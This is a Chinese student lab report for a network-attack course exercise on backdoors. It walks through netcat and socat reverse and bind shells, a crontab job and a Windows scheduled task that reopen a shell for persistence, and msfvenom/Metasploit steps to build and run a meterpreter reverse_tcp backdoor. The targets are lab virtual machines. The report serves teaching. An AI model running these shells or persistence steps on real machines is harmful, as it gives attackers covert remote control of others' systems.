2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

例举你能想到的一个后门进入到你系统中的可能方式？
下载免费应用的时候会有绑定木马。
浏览某些网页时会有内置的木马程序。
例举你知道的后门如何启动起来(win及linux)的方式？
Windows：设置为开机自启动、用户直接执行带有后门的可执行文件
Linux：通过crontab功能将后门设为定时启动；也可以通过对正常软件绑定注入shellcode
Meterpreter有哪些给你映像深刻的功能？
我认为是截屏功能，能随时查看被访问主机的操作
如何发现自己有系统有没有被安装后门？
定期查杀木马。

1.首先在win7虚拟机开启监听ncat.exe -l -p 5317

2.Linux反弹连接win10 nc 192.168.1.104 5317 -e /bin/sh此处IP为win10的ip

3.Windows成功获得kali的shell

1.在kali中使用ifconfig查看IP

2.打开监听nc -l -p 5317

3.在Windows中反弹连接kali，ncat.exe -e cmd.exe 192.168.1.105 5317

4.kali成功获得Windows的命令提示

1.Windows下监听5317端口，ncat.exe -l 5317

2.kali反弹连接到Windows的5317端口，nc 192.168.1.104 5317

3.连接建立成功，双方可以相互传输数据

1.Windows下监听5317端口，并把收到的数据保存到file1.out中，ncat.exe -l 5317 > file1out

2.kali反弹连接到Windows的5317端口,nc 192.168.1.104 5317 < file1.in

3.连接建立成功，Win可以收到kali发来的文件。

在Windows系统下，监听5317端口
在Kali环境下，用crontab -e指令编辑一条定时任务，（crontab指令增加一条定时任务，"-e"表示编辑）选择编辑器时选择3（vim）
在最后一行添加26 * * * * /bin/netcat 192.168.1.104 5317 -e /bin/sh，意思是在每个小时的第26分钟反向连接Windows主机的5317端口。

效果如下：

在Windows7系统下，打开计算机管理，创建任务，填写任务名称后20165317，新建一个触发器,设为工作站锁定时。
在编辑操作中选择你的socat.exe文件的路径，在添加参数一栏填写tcp-listen:5317 exec:cmd.exe,pty,stderr，这个命令的作用是把cmd.exe绑定到端口5317，同时把cmd.exe的stderr重定向到stdout上
win+L或者右键运行，然后用kali输入socat - tcp:192.168.1.104:5317 获得成功

通过在kali中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=5317 -f exe > 20165317_backdoor.exe，IP地址为LinuxIP，生成了后门程序20165317_backdoor.exe
在win7中监听ncat.exe -l 5317 > 20165317_backdoor.exe
在Linux中输入nc 192.168.1.104 5317 < 20165317_backdoor.exe
在Kali上使用msfconsole指令进入msf控制台
输入use exploit/multi/handler使用监听模块，设置payload
set payload windows/meterpreter/reverse_tcp，使用和生成后门程序时相同的payload
set LHOST 192.168.1.105，这里用的是LinuxIP，和生成后门程序时指定的IP相同
set LPORT 5317，同样要使用相同的端口
设置完成后，执行监听
在win7上运行后门程序，并且在kali得到了远程控制的shell